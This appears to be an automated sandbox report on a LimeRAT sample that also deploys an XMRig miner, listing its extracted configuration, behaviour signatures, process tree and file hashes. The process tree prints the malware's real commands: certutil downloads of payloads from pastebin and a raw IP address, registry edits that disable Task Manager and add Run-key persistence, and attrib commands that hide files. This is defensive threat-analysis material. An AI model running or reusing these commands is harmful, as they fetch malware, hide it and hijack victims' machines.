Analysis

  • max time kernel
    32s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    14-09-2022 23:36

General

  • Target

    eb9e4955edda276425933aea122f9a84.exe

  • Size

    47KB

  • MD5

    eb9e4955edda276425933aea122f9a84

  • SHA1

    6763106ffdc12cf213f579f72c1c6e8f3272fa9c

  • SHA256

    75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

  • SHA512

    621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

  • SSDEEP

    768:e7DiMIvhyqeFRKUKPl2+Vf7lWDVkUmg1/oRxf0IbvDOPbPlEnNFqoBc:KiMdzgdoEfskV8Of9bvDI7GDlBc

Malware Config

Extracted

Family

limerat

Attributes
  • aes_key

    beodz

  • antivm

    false

  • c2_url

    https://pastebin.com/raw/PEKpeQWU

  • delay

    3

  • download_payload

    false

  • install

    true

  • install_name

    winlogon.exe

  • main_folder

    AppData

  • pin_spread

    false

  • sub_folder

    \AppData\Windows Protector\

  • usb_spread

    false

Signatures

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Adds policy Run key to start application 2 TTPs 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Sets file to hidden 1 TTPs 14 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • UPX packed file 11 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 9 IoCs
  • Adds Run key to start application 2 TTPs 12 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 6 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe
    "C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2472
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6F49.tmp\6F4A.bat C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3364
      • C:\Windows\system32\certutil.exe
        certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
        3⤵
          PID:3112
        • C:\Windows\system32\find.exe
          find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
          3⤵
            PID:2180
          • C:\Windows\system32\cmd.exe
            cmd /c del "C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
            3⤵
              PID:1016
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process where name='taskmgr.exe' delete
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:3972
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process where name='Taskmgr.exe' delete
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1440
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic process where name='xmrig.exe' delete
              3⤵
                PID:5064
              • C:\Windows\system32\reg.exe
                REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                3⤵
                • Modifies registry key
                PID:640
              • C:\Windows\system32\certutil.exe
                certutil -urlcache -split -f https://pastebin.com/raw/03Gje1tb "C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat"
                3⤵
                  PID:5036
                • C:\Windows\system32\find.exe
                  find /c "set active" "C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat"
                  3⤵
                    PID:1452
                  • C:\Windows\system32\certutil.exe
                    certutil -urlcache -split -f "http://52.77.214.77:8083/IE.exe" C:\Users\Admin\AppData\Local\Temp\IE.exe
                    3⤵
                      PID:1584
                    • C:\Users\Admin\AppData\Local\Temp\IE.exe
                      "C:\Users\Admin\AppData\Local\Temp\IE.exe"
                      3⤵
                      • Executes dropped EXE
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3440
                      • C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe
                        "C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
                        4⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Suspicious use of WriteProcessMemory
                        PID:5000
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9232.tmp\9233.bat C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
                          5⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3684
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic process where name='taskmgr.exe' delete
                            6⤵
                              PID:4008
                            • C:\Windows\system32\taskkill.exe
                              taskkill /IM taskmgr.exe /F
                              6⤵
                              • Kills process with taskkill
                              PID:2248
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic process where name='Taskmgr.exe' delete
                              6⤵
                                PID:816
                              • C:\Windows\system32\taskkill.exe
                                taskkill /IM Taskmgr.exe /F
                                6⤵
                                • Kills process with taskkill
                                PID:1112
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic process where name='xmrig.exe' delete
                                6⤵
                                  PID:3324
                                • C:\Windows\system32\taskkill.exe
                                  taskkill /IM xmrig.exe /F
                                  6⤵
                                  • Kills process with taskkill
                                  PID:5092
                                • C:\Windows\system32\reg.exe
                                  REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                  6⤵
                                  • Modifies registry key
                                  PID:3472
                                • C:\Windows\system32\attrib.exe
                                  attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
                                  6⤵
                                  • Views/modifies file attributes
                                  PID:2320
                                • C:\Windows\system32\attrib.exe
                                  attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
                                  6⤵
                                  • Views/modifies file attributes
                                  PID:2088
                                • C:\Windows\system32\xcopy.exe
                                  xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\backup.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
                                  6⤵
                                    PID:4028
                                  • C:\Windows\system32\xcopy.exe
                                    xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\main.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
                                    6⤵
                                      PID:1940
                                    • C:\Users\Admin\AppData\Local\Temp\updateW\irom.com
                                      "C:\Users\Admin\AppData\Local\Temp\updateW\irom.com"
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      • Modifies registry class
                                      PID:392
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs"
                                        7⤵
                                        • Blocklisted process makes network request
                                        • Drops startup file
                                        • Adds Run key to start application
                                        PID:3648
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs"
                                        7⤵
                                        • Blocklisted process makes network request
                                        • Drops startup file
                                        • Adds Run key to start application
                                        PID:4244
                                    • C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com
                                      "C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com"
                                      6⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:4380
                                      • C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe
                                        "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3620
                                        • C:\Users\Admin\AppData\Local\Temp\tmp224.tmp.exe
                                          "C:\Users\Admin\AppData\Local\Temp\tmp224.tmp.exe"
                                          8⤵
                                            PID:2008
                                            • C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe
                                              "C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
                                              9⤵
                                                PID:3476
                                                • C:\Windows\system32\cmd.exe
                                                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B0C.tmp\B0D.bat C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
                                                  10⤵
                                                    PID:2804
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic process where name='taskmgr.exe' delete
                                                      11⤵
                                                        PID:3084
                                                      • C:\Windows\system32\taskkill.exe
                                                        taskkill /IM taskmgr.exe /F
                                                        11⤵
                                                        • Kills process with taskkill
                                                        PID:1576
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic process where name='Taskmgr.exe' delete
                                                        11⤵
                                                          PID:4068
                                                        • C:\Windows\system32\taskkill.exe
                                                          taskkill /IM Taskmgr.exe /F
                                                          11⤵
                                                          • Kills process with taskkill
                                                          PID:4124
                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                          wmic process where name='xmrig.exe' delete
                                                          11⤵
                                                            PID:4028
                                                          • C:\Windows\system32\taskkill.exe
                                                            taskkill /IM xmrig.exe /F
                                                            11⤵
                                                            • Kills process with taskkill
                                                            PID:2560
                                                          • C:\Windows\system32\reg.exe
                                                            REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                            11⤵
                                                            • Modifies registry key
                                                            PID:804
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
                                                            11⤵
                                                            • Views/modifies file attributes
                                                            PID:3724
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
                                                            11⤵
                                                            • Views/modifies file attributes
                                                            PID:2928
                                                          • C:\Windows\system32\xcopy.exe
                                                            xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\backup.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
                                                            11⤵
                                                              PID:2476
                                                            • C:\Windows\system32\xcopy.exe
                                                              xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\main.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
                                                              11⤵
                                                                PID:2084
                                                              • C:\Users\Admin\AppData\Local\Temp\updateW\irom.com
                                                                "C:\Users\Admin\AppData\Local\Temp\updateW\irom.com"
                                                                11⤵
                                                                  PID:1076
                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs"
                                                                    12⤵
                                                                      PID:3256
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs"
                                                                      12⤵
                                                                        PID:4520
                                                                    • C:\Windows\system32\attrib.exe
                                                                      attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
                                                                      11⤵
                                                                      • Sets file to hidden
                                                                      • Views/modifies file attributes
                                                                      PID:1000
                                                                    • C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe
                                                                      "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe"
                                                                      11⤵
                                                                        PID:1012
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
                                                                        11⤵
                                                                        • Sets file to hidden
                                                                        • Views/modifies file attributes
                                                                        PID:1944
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\*.*"
                                                                        11⤵
                                                                        • Sets file to hidden
                                                                        • Views/modifies file attributes
                                                                        PID:8
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector"
                                                                        11⤵
                                                                        • Sets file to hidden
                                                                        • Views/modifies file attributes
                                                                        PID:3716
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData"
                                                                        11⤵
                                                                        • Sets file to hidden
                                                                        • Views/modifies file attributes
                                                                        PID:2260
                                                                      • C:\Windows\system32\certutil.exe
                                                                        certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
                                                                        11⤵
                                                                          PID:4496
                                                                        • C:\Windows\system32\find.exe
                                                                          find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
                                                                          11⤵
                                                                            PID:3044
                                                                          • C:\Windows\system32\cmd.exe
                                                                            cmd /c del "C:\Users\Admin\AppData\Local\Temp\updateW\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
                                                                            11⤵
                                                                              PID:3492
                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              wmic process where name='Microsoft.exe' delete
                                                                              11⤵
                                                                                PID:3696
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic process where name='winupdate.exe' delete
                                                                                11⤵
                                                                                  PID:2356
                                                                                • C:\Windows\system32\reg.exe
                                                                                  REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
                                                                                  11⤵
                                                                                    PID:2360
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
                                                                                    11⤵
                                                                                      PID:2516
                                                                                    • C:\Windows\system32\attrib.exe
                                                                                      attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
                                                                                      11⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:1328
                                                                                    • C:\Windows\system32\attrib.exe
                                                                                      attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
                                                                                      11⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:4148
                                                                                    • C:\Windows\system32\attrib.exe
                                                                                      attrib -s -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
                                                                                      11⤵
                                                                                      • Views/modifies file attributes
                                                                                      PID:4956
                                                                                    • C:\Windows\system32\xcopy.exe
                                                                                      xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates" /K /D /H /Y
                                                                                      11⤵
                                                                                        PID:4480
                                                                                      • C:\Windows\system32\xcopy.exe
                                                                                        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /K /D /H /Y
                                                                                        11⤵
                                                                                          PID:1544
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
                                                                                          11⤵
                                                                                          • Sets file to hidden
                                                                                          • Views/modifies file attributes
                                                                                          PID:3516
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
                                                                                          11⤵
                                                                                          • Sets file to hidden
                                                                                          • Views/modifies file attributes
                                                                                          PID:4268
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
                                                                                          11⤵
                                                                                            PID:4308
                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                              wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
                        12⤵
                        PID:1716
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
                      11⤵
                      PID:3060
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
                      11⤵
                      PID:2148
                    • C:\Windows\system32\attrib.exe
                      attrib -s -h "C:\Windows (x86)\*.*"
                      11⤵
                      • Views/modifies file attributes
                      PID:3672
                    • C:\Windows (x86)\explorer.exe
                      "C:\Windows (x86)\explorer.exe"
                      11⤵
                      PID:220
          • C:\Windows\system32\attrib.exe
            attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
            6⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:1692
          • C:\Windows\system32\attrib.exe
            attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
            6⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:1388
          • C:\Windows\system32\attrib.exe
            attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\*.*"
            6⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:2812
          • C:\Windows\system32\attrib.exe
            attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector"
            6⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:3400
          • C:\Windows\system32\attrib.exe
            attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData"
            6⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:4264
          • C:\Windows\system32\certutil.exe
            certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
            6⤵
            PID:2388
          • C:\Windows\system32\find.exe
            find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
            6⤵
            PID:2644
          • C:\Windows\system32\cmd.exe
            cmd /c del "C:\Users\Admin\AppData\Local\Temp\updateW\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
            6⤵
            PID:3964
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where name='Microsoft.exe' delete
            6⤵
            PID:2828
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where name='winupdate.exe' delete
            6⤵
            PID:3444
          • C:\Windows\system32\reg.exe
            REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
            6⤵
            • Adds Run key to start application
            PID:2064
          • C:\Windows\system32\reg.exe
            REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
            6⤵
            • Adds Run key to start application
            PID:8
          • C:\Windows\system32\attrib.exe
            attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
            6⤵
            • Views/modifies file attributes
            PID:4168
          • C:\Windows\system32\attrib.exe
            attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
            6⤵
            • Views/modifies file attributes
            PID:4496
          • C:\Windows\system32\attrib.exe
            attrib -s -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
            6⤵
            • Drops startup file
            • Views/modifies file attributes
            PID:3044
          • C:\Windows\system32\xcopy.exe
            xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates" /K /D /H /Y
            6⤵
            PID:1100
          • C:\Windows\system32\xcopy.exe
            xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /K /D /H /Y
            6⤵
            • Drops startup file
            PID:996
          • C:\Windows\system32\attrib.exe
            attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
            6⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:4256
          • C:\Windows\system32\attrib.exe
            attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
            6⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:884
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
            6⤵
            PID:4692
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
            6⤵
            PID:5028
          • C:\Windows\system32\attrib.exe
            attrib -s -h "C:\Windows (x86)\*.*"
            6⤵
            • Views/modifies file attributes
            PID:3016
          • C:\Windows\system32\certutil.exe
            certutil -urlcache -split -f "http://52.77.214.77:8083/xm/win.com" "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
            6⤵
            PID:2848
          • C:\Windows\system32\certutil.exe
            certutil -urlcache -split -f "http://52.77.214.77:8083/xm/64a1.com" "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
            6⤵
            PID:3392
          • C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com
            "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
            6⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Modifies registry class
            PID:32
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Windows (x86)\aarun.vbs"
              7⤵
              • Checks computer location settings
              PID:3828
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Windows (x86)\xagal.bat" "
                8⤵
                PID:4436
                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                  wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
                  9⤵
                  PID:4124
                • C:\Windows\SysWOW64\attrib.exe
                  attrib -s -h "C:\Windows (x86)\*.*"
                  9⤵
                  • Views/modifies file attributes
                  PID:2236
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "="
                  9⤵
                  PID:3652
                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                    wmic csproduct get UUID /format:list
                    10⤵
                    PID:1000
                  • C:\Windows\SysWOW64\find.exe
                    find "="
                    10⤵
                    PID:3400
                • C:\Windows (x86)\explorer.exe
                  "C:\Windows (x86)\explorer.exe"
                  9⤵
                  • Adds policy Run key to start application
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  PID:1784
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c del "C:\Windows (x86)\xagal.bat"
                  9⤵
                  PID:3916
          • C:\Users\Admin\AppData\Local\Temp\updateW\win.com
            "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
            6⤵
            • Executes dropped EXE
            PID:2908
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.1 -n 5
            6⤵
            • Runs ping.exe
            PID:4372
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
            6⤵
            PID:3444
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
            6⤵
            PID:5060
          • C:\Windows\system32\attrib.exe
            attrib -s -h "C:\Windows (x86)\*.*"
            6⤵
            • Views/modifies file attributes
            PID:5020
          • C:\Windows (x86)\explorer.exe
            "C:\Windows (x86)\explorer.exe"
            6⤵
            • Adds policy Run key to start application
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            PID:1004
    • C:\Windows\system32\cmd.exe
      cmd /c del "C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat""
      3⤵
      PID:3392

Network

MITRE ATT&CK Enterprise v6

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      d94de84fd13a9a2a0f149fc2345b86fa

                                                                                                                      SHA1

                                                                                                                      a33cbf048dd9093095a005b27127233c43f76a6c

                                                                                                                      SHA256

                                                                                                                      b67d26b491cc6a8e2930701d99516b3f6ed83223194d830573dbfdae3808299d

                                                                                                                      SHA512

                                                                                                                      3fda5b67dc46ff423493a379db1a682b87cb9430005e171ecb68b5893a80ba0026bcb9ade2f71a085a93f94fd43943da171a56302e2feb719756a0eaabcf28b8

                                                                                                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9E610D72817F59FAB1BFA75BAAB7746D

                                                                                                                      Filesize

                                                                                                                      132B

                                                                                                                      MD5

                                                                                                                      cc9ff4010b7de68a7328981e59618920

                                                                                                                      SHA1

                                                                                                                      d709369490a2544d620ba0df857dadd0bb0d791c

                                                                                                                      SHA256

                                                                                                                      b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24

                                                                                                                      SHA512

                                                                                                                      e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
  Filesize: 408B
  MD5: da3cbfd4a25c4b0af96e5414da595623
  SHA1: e865c8d3a2ff23c949e70dd8d80b49219aa3d5ac
  SHA256: afd1db58b387157798a5132f8a1124e7008e1ec2dc276a501464768f9fd25ad0
  SHA512: 2a3e229f89db0afabd66ad675da4938a40bdb332739c9f1acadc61a21e340e73908bd1bd9d0cef404a9dbdb8f82a3adf18a09af9dc85b8c8c0c40b3808f15171

• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9E610D72817F59FAB1BFA75BAAB7746D
  Filesize: 184B
  MD5: 906c6fc80f327690e61fa7faf60ce36c
  SHA1: 22fc2182a97f99ce74c30167bd44df3e6ba9e0f6
  SHA256: b7b41259740b5cb7f713cf0896a8a2dc5bfb8258bc3029c86e662cf2093f0ac4
  SHA512: f9cd73fcd3e425c06dad36cab490e0fa03a05bd2fc58b1d92d2a404c97aa17ff8895dad333f90a3ba0835a1a6ed1ae8ba60477cdaa4b6ce911cfd791bbaca95a

• C:\Users\Admin\AppData\Local\Temp\6F49.tmp\6F4A.bat
  Filesize: 13KB
  MD5: 6d37a766ec204ef499738c03beb212fb
  SHA1: 295fdd98a838a5be50c9d3ff6052b27d25d3a231
  SHA256: 7043b19cd4b5d5087ff95dc07f816099bad634c28f34e3e904c1d4efca222ab9
  SHA512: 606c799fc9535767b241a9ab81fd9194f566f454d66110454fc9f10a2e511dc1bd2cf86121e6a7a0ada09bdac2c4110c3d9621ae7cb5c35f30ab0bda63781c5f

• C:\Users\Admin\AppData\Local\Temp\9232.tmp\9233.bat
  Filesize: 13KB
  MD5: b8d37d42c7b70fb63c19f741c3a23d63
  SHA1: 62c43ac9efa8f3abb6a3a1f529076ef5d3ae37d9
  SHA256: 6822b2a4a79cf09c86263d7464abc7ccf375dd37ba5ff5503f3c4f1c9fad8188
  SHA512: 800bc7db00e77a6f563a9f036c45b3a91eb07831080903da043c00cd5d76cd0528a79458365f4077020830515a3b23689e751e9bed940738c3221a93f491d19e

• C:\Users\Admin\AppData\Local\Temp\IE.exe
  Filesize: 772KB
  MD5: 7ed5b2dec02ef2ddc967fa9ca0dd8d2f
  SHA1: 0f471be520c5c78a0a40a4026237e04c366a3110
  SHA256: c787c9a5f407a656478efc835f1a0f8f738030bf26cedbd4748cb7b18ed2ea3e
  SHA512: 9e8df81da00ccd9345bf3dfa2f01906830ca718875c0e535498eed6a73db62a1ec3149ea611d1f60c1c144a86d6f94482b985a9e7dbdd23b5d8f1b43e347f09e

• C:\Users\Admin\AppData\Local\Temp\VERIU.BAT
  Filesize: 132B
  MD5: cc9ff4010b7de68a7328981e59618920
  SHA1: d709369490a2544d620ba0df857dadd0bb0d791c
  SHA256: b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24
